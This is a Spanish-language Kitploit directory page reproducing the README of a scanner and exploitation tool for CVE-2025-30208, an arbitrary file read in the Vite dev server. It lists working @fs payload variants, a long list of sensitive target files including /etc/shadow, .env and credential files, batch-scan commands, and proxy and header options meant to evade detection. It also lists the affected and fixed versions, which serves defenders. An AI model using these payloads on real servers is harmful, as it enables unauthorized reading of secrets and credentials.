Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 es una vulnerabilidad de gravedad media de lectura arbitraria de archivos en el servidor de desarrollo de Vite (una popular herramienta de compilación para frontend) | Kitploit
Herramientas/GitHubGitHub/themehackers/cve-2025-30208
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 es una vulnerabilidad de gravedad media de lectura arbitraria de archivos en el servidor de desarrollo de Vite (una popular herramienta de compilación para frontend)

Ver Repositorio
10hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔥 Escáner de Vulnerabilidad de Lectura Arbitraria de Archivos en Vite CVE-2025-30208

Python License Security Status Modular

Escáner de vulnerabilidades avanzado para CVE-2025-30208 con características de nivel empresarial

Herramienta profesional de pruebas de penetración para la detección de la vulnerabilidad de lectura arbitraria de archivos en Vite

🚀 Inicio Rápido • 📋 Características • 🔧 Uso • 📊 Ejemplos • 🛡️ Seguridad


📖 Descripción General

Este es un escáner de vulnerabilidades integral diseñado para detectar y explotar la vulnerabilidad CVE-2025-30208 en los servidores de desarrollo de Vite. La vulnerabilidad permite el acceso de lectura arbitraria de archivos a través de los endpoints del sistema de archivos de Vite, pudiendo exponer archivos de configuración sensibles, código fuente e información del sistema.

🎯 Qué Hace Esta Herramienta

  • Detecta instancias vulnerables de Vite en redes
  • Explota la vulnerabilidad de lectura arbitraria de archivos de forma segura
  • Descubre archivos sensibles y datos de configuración
  • Reporta los hallazgos en múltiples formatos (HTML, JSON, Consola)
  • Gestiona sesiones de escaneo y configuraciones
  • Maneja errores de forma elegante con mecanismos automáticos de reintento

🏗️ Arquitectura Modular

La herramienta ahora cuenta con una arquitectura modular para un mejor mantenimiento y extensibilidad:

  • CVE-2025-30208.py - Aplicación principal del escáner
  • payloads.py - Payloads avanzados de explotación (más de 60 variaciones)
  • sensitive_files.py - Base de datos integral de archivos sensibles (más de 200 archivos)
  • html_template.py - Plantilla mejorada de informes HTML estilo hacker

🚀 Inicio Rápido

Requisitos Previos

root@kitploit:~
pip3 install -r requirements.txt

Uso Básico

root@kitploit:~
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Características

🔍 Detección Central de Vulnerabilidades

  • Más de 60 Payloads Avanzados: Técnicas integrales de explotación para la máxima detección
  • Detección Inteligente: Análisis inteligente de respuestas para evitar falsos positivos
  • Validación en Tiempo Real: Validación continua de las respuestas del objetivo
  • Pruebas Integrales: Prueba todos los endpoints vulnerables conocidos

🛡️ Características de Seguridad Mejoradas

  • Soporte de Proxy: Configuración de proxy HTTP/HTTPS para anonimato
  • Cabeceras Personalizadas: Evita WAF/IPS con cabeceras HTTP personalizadas
  • Límite de Tasa: Retrasos configurables para evitar la detección
  • Gestión de Sesiones: Guarda y restaura sesiones de escaneo
  • Validación de Entrada: Validación integral de parámetros

🔧 Capacidades Avanzadas

  • Escaneo por Lotes: Escaneo multi-hilo de múltiples objetivos
  • Descubrimiento de Archivos Sensibles: Descubrimiento automático de más de 200 archivos sensibles
  • Pruebas de Conectividad: Pruebas de protocolo TCP/UDP/HTTP/HTTPS
  • Recuperación de Errores: Reintento automático con retroceso exponencial
  • Registro Integral: Registros detallados con marcas de tiempo

📊 Informes y Salida

  • 🎨 Informes HTML Mejorados: Hermosos informes de vulnerabilidades estilo hacker con animaciones
  • Exportación JSON: Datos estructurados para análisis posteriores
  • Salida de Consola: Retroalimentación en tiempo real con códigos de color
  • Archivos de Registro: Pistas de auditoría detalladas
  • Interfaz Web Interactiva: Servidor web integrado para visualizar informes

🔧 Guía de Uso

1. Configuración Básica

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Prueba de Vulnerabilidad

root@kitploit:~
CVE-2025-30208 > run

# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Escaneo por Lotes

root@kitploit:~
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]

4. Descubrimiento de Archivos Sensibles

root@kitploit:~
CVE-2025-30208 > scan

5. Configuración Avanzada

root@kitploit:~
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Informes HTML Mejorados

root@kitploit:~
# Generate beautiful HTML report
CVE-2025-30208 > pull

# Start web server to view report
CVE-2025-30208 > web

# Start web server on specific port
CVE-2025-30208 > web 8081

# Stop web server
CVE-2025-30208 > web off

📊 Referencia de Comandos


⚙️ Opciones de Configuración


🎨 Sistema de Payloads Mejorado

El escáner ahora utiliza más de 60 variaciones de payloads organizadas en payloads.py:

Payloads @fs Principales

root@kitploit:~
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

Variaciones de Parámetros Extendidos

root@kitploit:~
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Variaciones Específicas de Vite

root@kitploit:~
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

Variaciones del Sistema de Módulos

root@kitploit:~
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

Endpoints Alternativos

root@kitploit:~
/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 Descubrimiento Mejorado de Archivos Sensibles

La herramienta ahora prueba más de 200 archivos sensibles organizados en sensitive_files.py:

🖥️ Archivos del Sistema (Linux/Unix)

  • /etc/passwd - Información de cuentas de usuario
  • /etc/shadow - Datos de contraseñas cifradas
  • /etc/services - Servicios de red
  • /etc/hosts - Mapeos de hostnames
  • /etc/fstab - Tabla del sistema de archivos
  • /etc/ssh/sshd_config - Configuración del servidor SSH
  • /etc/crontab - Tareas cron del sistema
  • /etc/sudoers - Configuración de sudo

📊 Información de Procesos

  • /proc/version - Versión del kernel
  • /proc/cpuinfo - Información de la CPU
  • /proc/meminfo - Información de la memoria
  • /proc/self/environ - Entorno del proceso
  • /proc/self/cmdline - Línea de comandos del proceso
  • /proc/net/tcp - Conexiones TCP
  • /proc/net/udp - Conexiones UDP

⚙️ Configuración de Aplicaciones

  • .env - Variables de entorno
  • .env.local - Entorno local
  • .env.production - Entorno de producción
  • config.json - Configuración de la aplicación
  • settings.json - Ajustes de la aplicación
  • application.properties - Configuración de Spring
  • application.yml - Configuración YAML
  • database.yml - Configuración de la base de datos
  • secrets.json - Gestión de secretos

📦 Archivos Node.js / JavaScript

  • package.json - Dependencias de Node.js
  • package-lock.json - Dependencias bloqueadas
  • yarn.lock - Archivo de bloqueo de Yarn
  • vite.config.js - Configuración de Vite
  • vite.config.ts - Configuración de Vite en TypeScript
  • tsconfig.json - Configuración de TypeScript
  • webpack.config.js - Configuración de Webpack
  • next.config.js - Configuración de Next.js
  • nuxt.config.js - Configuración de Nuxt.js
  • angular.json - Configuración de Angular
  • vue.config.js - Configuración de Vue.js
  • rollup.config.js - Configuración de Rollup
  • - Configuración de ESLint

🔧 Archivos Git

  • .git/config - Configuración de Git
  • .gitignore - Reglas de ignorado de Git
  • .gitattributes - Atributos de Git
  • .gitmodules - Submódulos de Git
  • .git/HEAD - Rama actual
  • .git/logs/HEAD - Registros de Git
  • .git/refs/heads/master - Rama master
  • .git/refs/heads/main - Rama main

📚 Archivos de Documentación

  • README.md - Documentación del proyecto
  • CHANGELOG.md - Registro de cambios
  • LICENSE - Información de la licencia
  • CONTRIBUTING.md - Guías de contribución
  • AUTHORS - Información de los autores
  • TODO.md - Lista de tareas
  • ROADMAP.md - Hoja de ruta de desarrollo

🐳 Archivos Docker

  • Dockerfile - Configuración de Docker
  • docker-compose.yml - Docker Compose
  • docker-compose.override.yml - Configuración de anulación
  • .dockerignore - Reglas de ignorado de Docker
  • docker-compose.prod.yml - Configuración de producción
  • docker-compose.dev.yml - Configuración de desarrollo

🌐 Configuración de Servidor Web

  • nginx.conf - Configuración de Nginx
  • apache2.conf - Configuración de Apache
  • httpd.conf - Configuración del daemon HTTP
  • .htaccess - Control de acceso de Apache
  • web.config - Configuración de IIS
  • robots.txt - Directivas para motores de búsqueda
  • sitemap.xml - Estructura del sitio
  • manifest.json - Manifest de la aplicación web
  • sw.js - Service worker
  • firebase.json - Configuración de Firebase
  • firebase.rules - Reglas de seguridad de Firebase

🪟 Archivos Windows

  • boot.ini - Configuración de arranque
  • autoexec.bat - Script de auto-ejecución
  • system.ini - Configuración del sistema
  • win.ini - Configuración de Windows
  • Users - Directorios de usuario
  • Windows - Archivos del sistema
  • Program Files - Directorios de aplicaciones

🍎 Archivos macOS

  • System - Archivos del sistema
  • Library - Archivos de biblioteca
  • Applications - Archivos de aplicaciones
  • private/etc/hosts - Archivo de hosts
  • private/etc/passwd - Cuentas de usuario

🗄️ Archivos de Base de Datos

  • database.db - Base de datos SQLite
  • database.sqlite - Base de datos SQLite
  • data.db - Base de datos de datos
  • dump.sql - Volcado de la base de datos
  • schema.sql - Esquema de la base de datos
  • migrations - Migraciones de la base de datos

📝 Archivos de Registro

  • logs - Directorio de registros
  • error.log - Registros de errores
  • access.log - Registros de acceso
  • app.log - Registros de la aplicación
  • debug.log - Registros de depuración
  • combined.log - Registros combinados

💾 Archivos de Copia de Seguridad

  • backup - Directorio de copias de seguridad
  • backup.sql - Copia de seguridad de la base de datos
  • backup.zip - Copia de seguridad comprimida
  • dump - Volcado de datos
  • export - Exportación de datos

🔒 Seguridad y Autenticación

  • auth.json - Configuración de autenticación
  • credentials.json - Almacenamiento de credenciales
  • keys.json - Gestión de claves
  • tokens.json - Almacenamiento de tokens
  • jwt.json - Configuración de JWT
  • oauth.json - Configuración de OAuth

🔌 Archivos de API y Servicios

  • api.json - Configuración de API
  • swagger.json - Documentación de API
  • openapi.json - Especificación OpenAPI
  • graphql.json - Configuración de GraphQL
  • schema.json - Esquema de API

☁️ Nube y Despliegue

  • cloudformation.yml - AWS CloudFormation
  • serverless.yml - Configuración Serverless
  • terraform.tf - Configuración de Terraform
  • kubernetes.yml - Configuración de Kubernetes
  • k8s.yml - Configuración de Kubernetes

📊 Monitoreo y Analítica

  • analytics.json - Configuración de analítica
  • monitoring.json - Configuración de monitoreo
  • metrics.json - Configuración de métricas
  • telemetry.json - Datos de telemetría

🎨 Informes HTML Mejorados

La herramienta ahora genera hermosos informes HTML estilo hacker con:

✨ Características Visuales

  • Fondo estilo Matrix con caracteres animados cayendo
  • Animaciones de degradado y efectos de brillo
  • Elementos interactivos con efectos de hover
  • Diseño adaptable para todos los dispositivos
  • Tema oscuro optimizado para profesionales de seguridad

📊 Estadísticas Interactivas

  • Contadores en tiempo real de fugas totales y bytes expuestos
  • Indicadores de severidad con códigos de color
  • Funcionalidad de copiado para cada fuga
  • Vista previa del contenido con tamaño y número de líneas
  • Secciones expandibles para análisis detallado

🔧 Características Técnicas

  • Integración de Google Fonts (JetBrains Mono, Orbitron)
  • Animaciones y transiciones CSS
  • Interactividad con JavaScript para una mejor experiencia de usuario
  • Diseño adaptable a móviles
  • Compatibilidad entre navegadores

🌐 Integración del Servidor Web

  • Servidor HTTP integrado para visualizar informes
  • Apertura automática del navegador
  • Opciones de configuración de puerto
  • Comandos fáciles de inicio/detención

🛡️ Manejo de Errores y Recuperación

Mecanismo de Reintento Automático

  • 3 Intentos de Reintento: Las solicitudes fallidas se reintentan automáticamente
  • Retroceso Exponencial: Retrasos crecientes entre reintentos
  • Clasificación Inteligente de Errores: Manejo diferenciado según el tipo de error
  • Recuperación Elegante: La herramienta continúa su operación después de los errores

Categorías de Error

  • NetworkError: Problemas de conexión, tiempo de espera o proxy
  • ConfigurationError: Ajustes y parámetros no válidos
  • ValidationError: Parámetros de entrada no válidos
  • ScannerError: Errores generales del escáner

Características de Validación

  • Validación de Entrada en Tiempo Real: Todos los parámetros se validan antes de su uso
  • Validación de Configuración: Validación completa antes de escanear
  • Pruebas de Conectividad: Pruebas de protocolo TCP/UDP/HTTP/HTTPS
  • Validación de Proxy: Validación del formato de URL del proxy

📁 Archivos de Salida


📝 Versiones Afectadas

🚨 Versiones Vulnerables

root@kitploit:~
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9

✅ Versiones No Afectadas

root@kitploit:~
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0

🛡️ Seguridad y Uso Ético

⚠️ Notas de Seguridad Importantes

  • Solo Pruebas Autorizadas: Utiliza únicamente en sistemas que poseas o para los que tengas permiso explícito de prueba
  • Divulgación Responsable: Reporta las vulnerabilidades a los propietarios del sistema
  • Límite de Tasa: Utiliza retrasos adecuados para no saturar los objetivos
  • Uso de Proxy: Considera el uso de proxies para el anonimato cuando corresponda
  • Cumplimiento Legal: Asegura el cumplimiento de las leyes y regulaciones locales

🔒 Buenas Prácticas

  • Obtén siempre permiso por escrito antes de realizar pruebas
  • Úsala únicamente en entornos controlados
  • Documenta todas las actividades de prueba
  • Respeta los límites de tasa y los recursos del sistema
  • Reporta los hallazgos de manera responsable

🚀 Ejemplos de Uso Avanzado

Ejemplo 1: Escaneo de Red Integral

root@kitploit:~
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

Ejemplo 2: Escaneo Sigiloso con Proxy

root@kitploit:~
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run

Ejemplo 3: Flujo de Trabajo de Informes Mejorado

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080

Ejemplo 4: Descubrimiento de Archivos Sensibles

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

🏗️ Estructura del Proyecto

root@kitploit:~
CVE-2025-30208/
├── CVE-2025-30208.py          # Main scanner application
├── payloads.py                # Advanced exploitation payloads (60+)
├── sensitive_files.py         # Sensitive file database (200+)
├── html_template.py           # Enhanced HTML reporting template
├── README.md                  # This documentation
├── requirements.txt           # Python dependencies
├── logs/                      # Log files directory
├── data_leak.html            # Generated HTML reports
├── data_leak.json            # Generated JSON reports
└── session.json              # Saved session configurations

🤝 Contribuciones

Agradecemos las contribuciones para mejorar esta herramienta:

  1. Haz un fork del repositorio
  2. Crea una rama de características
  3. Realiza tus cambios
  4. Prueba exhaustivamente
  5. Envía una pull request

Áreas de Contribución

  • Nuevas variaciones de payloads en payloads.py
  • Patrones adicionales de archivos sensibles en sensitive_files.py
  • Plantillas HTML mejoradas en html_template.py
  • Mejora del manejo de errores
  • Optimizaciones de rendimiento
  • Mejoras en la documentación

📄 Licencia

Este proyecto está licenciado únicamente para fines educativos y de pruebas de seguridad autorizadas.

⚠️ Aviso Legal: Esta herramienta está destinada únicamente a fines de pruebas de seguridad autorizadas e investigación. Los usuarios son responsables de asegurarse de contar con la autorización adecuada antes de probar cualquier sistema. Los autores no son responsables del mal uso de esta herramienta.


👨💻 Autor

ThemeHackers

GitHub

Investigador de Seguridad y Probador de Penetración


⭐ Si esta herramienta te fue útil, ¡por favor dale una estrella! ⭐

Hecha con ❤️ para la comunidad de seguridad

Descargar herramienta
ComandoDescripciónEjemplo
set <option> <value>Establece opciones de configuraciónset RHOST 192.168.1.100
show optionsMuestra la configuración actualshow options
editEditor interactivo de opcionesedit
run / exploitEjecuta la prueba de vulnerabilidadrun
batchEscanea múltiples objetivos por lotesbatch
scanDescubre archivos sensiblesscan
pullExporta los resultados a HTML/JSONpull
web [on|off|port]Servidor web para informes HTMLweb 8080
saveGuarda la configuración de la sesiónsave
loadCarga la configuración de la sesiónload
testPrueba la conectividad con el objetivotest
validateValida la configuración actualvalidate
verboseAlterna el modo verboseverbose
proxyConfigura los ajustes de proxyproxy
headersEstablece cabeceras HTTP personalizadasheaders
rateConfigura el límite de tasarate
logMuestra la información de registrolog
help / ?Muestra la ayudahelp
exit / quitSale de la herramientaexit
OpciónDescripciónPor DefectoValidación
RHOSTDirección IP/host del objetivo-Validación de hostname/IP
RPORTNúmero de puerto del objetivo-Rango de puertos (1-65535)
FILEPATHRuta de archivo a probaretc/passwdValidación de ruta
PROXYURL de proxy HTTP/HTTPS-Validación de formato de URL
VERBOSEHabilita la salida verbosefalseValidación booleana
RATE_LIMITRetraso entre solicitudes (segundos)0.3Validación numérica
THREADSNúmero de hilos para el escaneo por lotes5Validación de entero
TIMEOUTTiempo de espera de solicitud (segundos)5Validación de entero
CUSTOM_HEADERSCabeceras HTTP personalizadas (JSON){}Validación de formato JSON
eslint.config.js
  • prettier.config.js - Configuración de Prettier
  • jest.config.js - Configuración de Jest
  • babel.config.js - Configuración de Babel
  • tailwind.config.js - Configuración de Tailwind CSS
  • ArchivoDescripciónFormato
    data_leak.htmlInforme HTML de vulnerabilidades mejorado estilo hackerHTML
    data_leak.jsonExportación JSON estructuradaJSON
    sensitive_files_discovery.jsonArchivos sensibles descubiertosJSON
    session.jsonConfiguración de sesión guardadaJSON
    logs/cve_2025_30208_YYYYMMDD_HHMMSS.logRegistros de auditoría detalladosTexto